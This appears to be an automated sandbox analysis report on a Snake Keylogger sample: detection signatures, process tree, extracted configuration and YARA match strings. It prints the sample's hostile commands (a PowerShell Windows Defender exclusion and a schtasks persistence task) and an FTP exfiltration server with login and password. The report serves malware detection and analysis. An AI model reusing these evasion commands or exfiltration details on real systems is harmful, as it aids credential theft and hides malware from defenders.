Edit tour

Windows Analysis Report
pedido.pif.exe

Overview

General Information

Sample name:	pedido.pif.exe
Analysis ID:	1545937
MD5:	adf22eb2587ab26a966c2c9673580a73
SHA1:	a846d4a58ae7b294c1958cc538b5ed103e7445fb
SHA256:	a1777be6284799cc06a9d9072f4f3d2181287fb7770cbd7dbfb5bbd7d031dc30
Tags:	exeuser-lowmal3
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Snake Keylogger

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses FTP

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

pedido.pif.exe (PID: 3508 cmdline: "C:\Users\user\Desktop\pedido.pif.exe" MD5: ADF22EB2587AB26A966C2C9673580A73)

powershell.exe (PID: 3032 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 3552 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 1344 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RePUtenbQjvc" /XML "C:\Users\user\AppData\Local\Temp\tmp30EC.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 4668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

pedido.pif.exe (PID: 5188 cmdline: "C:\Users\user\Desktop\pedido.pif.exe" MD5: ADF22EB2587AB26A966C2C9673580A73)

RePUtenbQjvc.exe (PID: 6768 cmdline: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe MD5: ADF22EB2587AB26A966C2C9673580A73)

schtasks.exe (PID: 4536 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RePUtenbQjvc" /XML "C:\Users\user\AppData\Local\Temp\tmp4B59.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 4280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RePUtenbQjvc.exe (PID: 5040 cmdline: "C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe" MD5: ADF22EB2587AB26A966C2C9673580A73)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "FTP", "FTP Server": "ftp://50.31.176.103/", "FTP Username": "somac@gdmaduanas.com", "Password": "HW=f09RQ-BL1", "Version": "5.1"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.3870481673.000000000041B000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000007.00000002.3870481673.000000000041B000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x797:$x1: $%SMTPDV$ 0x86d:$x4: $%TelegramDv$ 0x763:$m2: Clipboard Logs ID 0x9bd:$m2: Screenshot Logs ID 0xacd:$m2: keystroke Logs ID 0xda7:$m3: SnakePW 0x995:$m4: \SnakeKeylogger\
00000007.00000002.3875604256.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000C.00000002.3870518292.0000000000413000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000C.00000002.3870518292.0000000000413000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3826:$a1: get_encryptedPassword 0x3b12:$a2: get_encryptedUsername 0x3632:$a3: get_timePasswordChanged 0x372d:$a4: get_passwordField 0x383c:$a5: set_encryptedPassword 0x4e60:$a7: get_logins 0x4dc3:$a10: KeyLoggerEventArgs 0x4a2e:$a11: KeyLoggerEventArgsEventHandler
0000000C.00000002.3874673292.0000000002D19000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000C.00000002.3874673292.0000000002C2A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000007.00000002.3875604256.0000000002FE9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000009.00000002.1563111145.0000000004293000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.1563111145.0000000004293000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000009.00000002.1563111145.0000000004293000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x80cae:$a1: get_encryptedPassword 0xa16ce:$a1: get_encryptedPassword 0xc1eee:$a1: get_encryptedPassword 0x80f9a:$a2: get_encryptedUsername 0xa19ba:$a2: get_encryptedUsername 0xc21da:$a2: get_encryptedUsername 0x80aba:$a3: get_timePasswordChanged 0xa14da:$a3: get_timePasswordChanged 0xc1cfa:$a3: get_timePasswordChanged 0x80bb5:$a4: get_passwordField 0xa15d5:$a4: get_passwordField 0xc1df5:$a4: get_passwordField 0x80cc4:$a5: set_encryptedPassword 0xa16e4:$a5: set_encryptedPassword 0xc1f04:$a5: set_encryptedPassword 0x822e8:$a7: get_logins 0xa2d08:$a7: get_logins 0xc3528:$a7: get_logins 0x8224b:$a10: KeyLoggerEventArgs 0xa2c6b:$a10: KeyLoggerEventArgs 0xc348b:$a10: KeyLoggerEventArgs
00000009.00000002.1563111145.0000000004293000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x85c1f:$x1: $%SMTPDV$ 0xa663f:$x1: $%SMTPDV$ 0xc6e5f:$x1: $%SMTPDV$ 0x84600:$x2: $#TheHashHere%& 0xa5020:$x2: $#TheHashHere%& 0xc5840:$x2: $#TheHashHere%& 0x845ac:$x3: %FTPDV$ 0xa4fcc:$x3: %FTPDV$ 0xc57ec:$x3: %FTPDV$ 0x85cf5:$x4: $%TelegramDv$ 0xa6715:$x4: $%TelegramDv$ 0xc6f35:$x4: $%TelegramDv$ 0x81eb6:$x5: KeyLoggerEventArgs 0x8224b:$x5: KeyLoggerEventArgs 0xa28d6:$x5: KeyLoggerEventArgs 0xa2c6b:$x5: KeyLoggerEventArgs 0xc30f6:$x5: KeyLoggerEventArgs 0xc348b:$x5: KeyLoggerEventArgs 0x85beb:$m2: Clipboard Logs ID 0x85e45:$m2: Screenshot Logs ID 0x85f55:$m2: keystroke Logs ID
0000000C.00000002.3874673292.0000000002A61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1496016243.0000000004A23000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1496016243.0000000004A23000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1496016243.0000000004A23000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x274ef6:$a1: get_encryptedPassword 0x295916:$a1: get_encryptedPassword 0x2b6136:$a1: get_encryptedPassword 0x2751e2:$a2: get_encryptedUsername 0x295c02:$a2: get_encryptedUsername 0x2b6422:$a2: get_encryptedUsername 0x274d02:$a3: get_timePasswordChanged 0x295722:$a3: get_timePasswordChanged 0x2b5f42:$a3: get_timePasswordChanged 0x274dfd:$a4: get_passwordField 0x29581d:$a4: get_passwordField 0x2b603d:$a4: get_passwordField 0x274f0c:$a5: set_encryptedPassword 0x29592c:$a5: set_encryptedPassword 0x2b614c:$a5: set_encryptedPassword 0x276530:$a7: get_logins 0x296f50:$a7: get_logins 0x2b7770:$a7: get_logins 0x276493:$a10: KeyLoggerEventArgs 0x296eb3:$a10: KeyLoggerEventArgs 0x2b76d3:$a10: KeyLoggerEventArgs
00000000.00000002.1496016243.0000000004A23000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x279e67:$x1: $%SMTPDV$ 0x29a887:$x1: $%SMTPDV$ 0x2bb0a7:$x1: $%SMTPDV$ 0x278848:$x2: $#TheHashHere%& 0x299268:$x2: $#TheHashHere%& 0x2b9a88:$x2: $#TheHashHere%& 0x2787f4:$x3: %FTPDV$ 0x299214:$x3: %FTPDV$ 0x2b9a34:$x3: %FTPDV$ 0x279f3d:$x4: $%TelegramDv$ 0x29a95d:$x4: $%TelegramDv$ 0x2bb17d:$x4: $%TelegramDv$ 0x2760fe:$x5: KeyLoggerEventArgs 0x276493:$x5: KeyLoggerEventArgs 0x296b1e:$x5: KeyLoggerEventArgs 0x296eb3:$x5: KeyLoggerEventArgs 0x2b733e:$x5: KeyLoggerEventArgs 0x2b76d3:$x5: KeyLoggerEventArgs 0x279e33:$m2: Clipboard Logs ID 0x27a08d:$m2: Screenshot Logs ID 0x27a19d:$m2: keystroke Logs ID
00000007.00000002.3875604256.0000000002D31000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: pedido.pif.exe PID: 3508	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: pedido.pif.exe PID: 3508	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: pedido.pif.exe PID: 3508	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: pedido.pif.exe PID: 3508	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x6e1a2:$a1: get_encryptedPassword 0x6e3a3:$a2: get_encryptedUsername 0x6dfcb:$a3: get_timePasswordChanged 0x6e0ba:$a4: get_passwordField 0x6e1b8:$a5: set_encryptedPassword 0x70142:$a7: get_logins 0x700ba:$a10: KeyLoggerEventArgs 0x6fe45:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: pedido.pif.exe PID: 3508	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x6fe45:$x5: KeyLoggerEventArgs 0x700ba:$x5: KeyLoggerEventArgs 0x708df:$x5: KeyLoggerEventArgs 0x70c40:$x5: KeyLoggerEventArgs 0x721b0:$m2: Clipboard Logs ID 0x722c4:$m2: Screenshot Logs ID 0x7231a:$m2: keystroke Logs ID 0x7244f:$m3: SnakePW 0x722b0:$m4: \SnakeKeylogger\
Process Memory Space: pedido.pif.exe PID: 5188	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: pedido.pif.exe PID: 5188	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: pedido.pif.exe PID: 5188	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x9592:$m2: Clipboard Logs ID 0x96a6:$m2: Screenshot Logs ID 0x96fc:$m2: keystroke Logs ID 0x9831:$m3: SnakePW 0x5f7e6:$m3: SnakePW 0x9692:$m4: \SnakeKeylogger\
Process Memory Space: RePUtenbQjvc.exe PID: 6768	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RePUtenbQjvc.exe PID: 6768	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RePUtenbQjvc.exe PID: 6768	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: RePUtenbQjvc.exe PID: 6768	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12201:$a1: get_encryptedPassword 0x124e3:$a2: get_encryptedUsername 0x12017:$a3: get_timePasswordChanged 0x12112:$a4: get_passwordField 0x12217:$a5: set_encryptedPassword 0x146ee:$a7: get_logins 0x14651:$a10: KeyLoggerEventArgs 0x142bc:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RePUtenbQjvc.exe PID: 6768	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x142bc:$x5: KeyLoggerEventArgs 0x14651:$x5: KeyLoggerEventArgs 0x14f58:$x5: KeyLoggerEventArgs 0x152b9:$x5: KeyLoggerEventArgs 0x16878:$m2: Clipboard Logs ID 0x1698c:$m2: Screenshot Logs ID 0x169e2:$m2: keystroke Logs ID 0x16b17:$m3: SnakePW 0x16978:$m4: \SnakeKeylogger\
Process Memory Space: RePUtenbQjvc.exe PID: 5040	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RePUtenbQjvc.exe PID: 5040	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: RePUtenbQjvc.exe PID: 5040	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x46bc7:$a1: get_encryptedPassword 0x46ea9:$a2: get_encryptedUsername 0x469dd:$a3: get_timePasswordChanged 0x46ad8:$a4: get_passwordField 0x46bdd:$a5: set_encryptedPassword 0x490b4:$a7: get_logins 0x49017:$a10: KeyLoggerEventArgs 0x48c82:$a11: KeyLoggerEventArgsEventHandler
Click to see the 29 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
7.2.pedido.pif.exe.400000.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
7.2.pedido.pif.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c3a1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b5d3:$a3: \Google\Chrome\User Data\Default\Login Data 0x1ba06:$a4: \Orbitum\User Data\Default\Login Data 0x1ca45:$a5: \Kometa\User Data\Default\Login Data
7.2.pedido.pif.exe.400000.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19997:$x1: $%SMTPDV$ 0x19a6d:$x4: $%TelegramDv$ 0x19963:$m2: Clipboard Logs ID 0x19bbd:$m2: Screenshot Logs ID 0x19ccd:$m2: keystroke Logs ID 0x19fa7:$m3: SnakePW 0x19b95:$m4: \SnakeKeylogger\
9.2.RePUtenbQjvc.exe.431fca8.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.RePUtenbQjvc.exe.431fca8.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
9.2.RePUtenbQjvc.exe.431fca8.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12c26:$a1: get_encryptedPassword 0x12f12:$a2: get_encryptedUsername 0x12a32:$a3: get_timePasswordChanged 0x12b2d:$a4: get_passwordField 0x12c3c:$a5: set_encryptedPassword 0x14260:$a7: get_logins 0x141c3:$a10: KeyLoggerEventArgs 0x13e2e:$a11: KeyLoggerEventArgsEventHandler
9.2.RePUtenbQjvc.exe.431fca8.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a5a1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x197d3:$a3: \Google\Chrome\User Data\Default\Login Data 0x19c06:$a4: \Orbitum\User Data\Default\Login Data 0x1ac45:$a5: \Kometa\User Data\Default\Login Data
9.2.RePUtenbQjvc.exe.431fca8.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x137de:$s1: UnHook 0x137e5:$s2: SetHook 0x137ed:$s3: CallNextHook 0x137fa:$s4: _hook
9.2.RePUtenbQjvc.exe.431fca8.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17b97:$x1: $%SMTPDV$ 0x16578:$x2: $#TheHashHere%& 0x16524:$x3: %FTPDV$ 0x17c6d:$x4: $%TelegramDv$ 0x13e2e:$x5: KeyLoggerEventArgs 0x141c3:$x5: KeyLoggerEventArgs 0x17b63:$m2: Clipboard Logs ID 0x17dbd:$m2: Screenshot Logs ID 0x17ecd:$m2: keystroke Logs ID 0x181a7:$m3: SnakePW 0x17d95:$m4: \SnakeKeylogger\
9.2.RePUtenbQjvc.exe.42ff288.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.RePUtenbQjvc.exe.42ff288.1.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
9.2.RePUtenbQjvc.exe.42ff288.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12c26:$a1: get_encryptedPassword 0x12f12:$a2: get_encryptedUsername 0x12a32:$a3: get_timePasswordChanged 0x12b2d:$a4: get_passwordField 0x12c3c:$a5: set_encryptedPassword 0x14260:$a7: get_logins 0x141c3:$a10: KeyLoggerEventArgs 0x13e2e:$a11: KeyLoggerEventArgsEventHandler
9.2.RePUtenbQjvc.exe.42ff288.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a5a1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x197d3:$a3: \Google\Chrome\User Data\Default\Login Data 0x19c06:$a4: \Orbitum\User Data\Default\Login Data 0x1ac45:$a5: \Kometa\User Data\Default\Login Data
9.2.RePUtenbQjvc.exe.42ff288.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x137de:$s1: UnHook 0x137e5:$s2: SetHook 0x137ed:$s3: CallNextHook 0x137fa:$s4: _hook
9.2.RePUtenbQjvc.exe.42ff288.1.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17b97:$x1: $%SMTPDV$ 0x16578:$x2: $#TheHashHere%& 0x16524:$x3: %FTPDV$ 0x17c6d:$x4: $%TelegramDv$ 0x13e2e:$x5: KeyLoggerEventArgs 0x141c3:$x5: KeyLoggerEventArgs 0x17b63:$m2: Clipboard Logs ID 0x17dbd:$m2: Screenshot Logs ID 0x17ecd:$m2: keystroke Logs ID 0x181a7:$m3: SnakePW 0x17d95:$m4: \SnakeKeylogger\
0.2.pedido.pif.exe.4c834d0.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.pedido.pif.exe.4c834d0.1.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.pedido.pif.exe.4c834d0.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12c26:$a1: get_encryptedPassword 0x12f12:$a2: get_encryptedUsername 0x12a32:$a3: get_timePasswordChanged 0x12b2d:$a4: get_passwordField 0x12c3c:$a5: set_encryptedPassword 0x14260:$a7: get_logins 0x141c3:$a10: KeyLoggerEventArgs 0x13e2e:$a11: KeyLoggerEventArgsEventHandler
0.2.pedido.pif.exe.4c834d0.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a5a1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x197d3:$a3: \Google\Chrome\User Data\Default\Login Data 0x19c06:$a4: \Orbitum\User Data\Default\Login Data 0x1ac45:$a5: \Kometa\User Data\Default\Login Data
0.2.pedido.pif.exe.4c834d0.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x137de:$s1: UnHook 0x137e5:$s2: SetHook 0x137ed:$s3: CallNextHook 0x137fa:$s4: _hook
0.2.pedido.pif.exe.4c834d0.1.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17b97:$x1: $%SMTPDV$ 0x16578:$x2: $#TheHashHere%& 0x16524:$x3: %FTPDV$ 0x17c6d:$x4: $%TelegramDv$ 0x13e2e:$x5: KeyLoggerEventArgs 0x141c3:$x5: KeyLoggerEventArgs 0x17b63:$m2: Clipboard Logs ID 0x17dbd:$m2: Screenshot Logs ID 0x17ecd:$m2: keystroke Logs ID 0x181a7:$m3: SnakePW 0x17d95:$m4: \SnakeKeylogger\
0.2.pedido.pif.exe.4c834d0.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.pedido.pif.exe.4c834d0.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.pedido.pif.exe.4c834d0.1.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.pedido.pif.exe.4c834d0.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a26:$a1: get_encryptedPassword 0x35446:$a1: get_encryptedPassword 0x55c66:$a1: get_encryptedPassword 0x14d12:$a2: get_encryptedUsername 0x35732:$a2: get_encryptedUsername 0x55f52:$a2: get_encryptedUsername 0x14832:$a3: get_timePasswordChanged 0x35252:$a3: get_timePasswordChanged 0x55a72:$a3: get_timePasswordChanged 0x1492d:$a4: get_passwordField 0x3534d:$a4: get_passwordField 0x55b6d:$a4: get_passwordField 0x14a3c:$a5: set_encryptedPassword 0x3545c:$a5: set_encryptedPassword 0x55c7c:$a5: set_encryptedPassword 0x16060:$a7: get_logins 0x36a80:$a7: get_logins 0x572a0:$a7: get_logins 0x15fc3:$a10: KeyLoggerEventArgs 0x369e3:$a10: KeyLoggerEventArgs 0x57203:$a10: KeyLoggerEventArgs
0.2.pedido.pif.exe.4c834d0.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c3a1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3cdc1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x5d5e1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b5d3:$a3: \Google\Chrome\User Data\Default\Login Data 0x3bff3:$a3: \Google\Chrome\User Data\Default\Login Data 0x5c813:$a3: \Google\Chrome\User Data\Default\Login Data 0x1ba06:$a4: \Orbitum\User Data\Default\Login Data 0x3c426:$a4: \Orbitum\User Data\Default\Login Data 0x5cc46:$a4: \Orbitum\User Data\Default\Login Data 0x1ca45:$a5: \Kometa\User Data\Default\Login Data 0x3d465:$a5: \Kometa\User Data\Default\Login Data 0x5dc85:$a5: \Kometa\User Data\Default\Login Data
0.2.pedido.pif.exe.4c834d0.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x155de:$s1: UnHook 0x35ffe:$s1: UnHook 0x5681e:$s1: UnHook 0x155e5:$s2: SetHook 0x36005:$s2: SetHook 0x56825:$s2: SetHook 0x155ed:$s3: CallNextHook 0x3600d:$s3: CallNextHook 0x5682d:$s3: CallNextHook 0x155fa:$s4: _hook 0x3601a:$s4: _hook 0x5683a:$s4: _hook
0.2.pedido.pif.exe.4c834d0.1.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19997:$x1: $%SMTPDV$ 0x3a3b7:$x1: $%SMTPDV$ 0x5abd7:$x1: $%SMTPDV$ 0x18378:$x2: $#TheHashHere%& 0x38d98:$x2: $#TheHashHere%& 0x595b8:$x2: $#TheHashHere%& 0x18324:$x3: %FTPDV$ 0x38d44:$x3: %FTPDV$ 0x59564:$x3: %FTPDV$ 0x19a6d:$x4: $%TelegramDv$ 0x3a48d:$x4: $%TelegramDv$ 0x5acad:$x4: $%TelegramDv$ 0x15c2e:$x5: KeyLoggerEventArgs 0x15fc3:$x5: KeyLoggerEventArgs 0x3664e:$x5: KeyLoggerEventArgs 0x369e3:$x5: KeyLoggerEventArgs 0x56e6e:$x5: KeyLoggerEventArgs 0x57203:$x5: KeyLoggerEventArgs 0x19963:$m2: Clipboard Logs ID 0x19bbd:$m2: Screenshot Logs ID 0x19ccd:$m2: keystroke Logs ID
0.2.pedido.pif.exe.4c20eb0.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.pedido.pif.exe.4c20eb0.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.pedido.pif.exe.4c20eb0.3.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.pedido.pif.exe.4c20eb0.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x77046:$a1: get_encryptedPassword 0x97a66:$a1: get_encryptedPassword 0xb8286:$a1: get_encryptedPassword 0x77332:$a2: get_encryptedUsername 0x97d52:$a2: get_encryptedUsername 0xb8572:$a2: get_encryptedUsername 0x76e52:$a3: get_timePasswordChanged 0x97872:$a3: get_timePasswordChanged 0xb8092:$a3: get_timePasswordChanged 0x76f4d:$a4: get_passwordField 0x9796d:$a4: get_passwordField 0xb818d:$a4: get_passwordField 0x7705c:$a5: set_encryptedPassword 0x97a7c:$a5: set_encryptedPassword 0xb829c:$a5: set_encryptedPassword 0x78680:$a7: get_logins 0x990a0:$a7: get_logins 0xb98c0:$a7: get_logins 0x785e3:$a10: KeyLoggerEventArgs 0x99003:$a10: KeyLoggerEventArgs 0xb9823:$a10: KeyLoggerEventArgs
0.2.pedido.pif.exe.4c20eb0.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x7e9c1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x9f3e1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xbfc01:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7dbf3:$a3: \Google\Chrome\User Data\Default\Login Data 0x9e613:$a3: \Google\Chrome\User Data\Default\Login Data 0xbee33:$a3: \Google\Chrome\User Data\Default\Login Data 0x7e026:$a4: \Orbitum\User Data\Default\Login Data 0x9ea46:$a4: \Orbitum\User Data\Default\Login Data 0xbf266:$a4: \Orbitum\User Data\Default\Login Data 0x7f065:$a5: \Kometa\User Data\Default\Login Data 0x9fa85:$a5: \Kometa\User Data\Default\Login Data 0xc02a5:$a5: \Kometa\User Data\Default\Login Data
0.2.pedido.pif.exe.4c20eb0.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x77bfe:$s1: UnHook 0x9861e:$s1: UnHook 0xb8e3e:$s1: UnHook 0x77c05:$s2: SetHook 0x98625:$s2: SetHook 0xb8e45:$s2: SetHook 0x77c0d:$s3: CallNextHook 0x9862d:$s3: CallNextHook 0xb8e4d:$s3: CallNextHook 0x77c1a:$s4: _hook 0x9863a:$s4: _hook 0xb8e5a:$s4: _hook
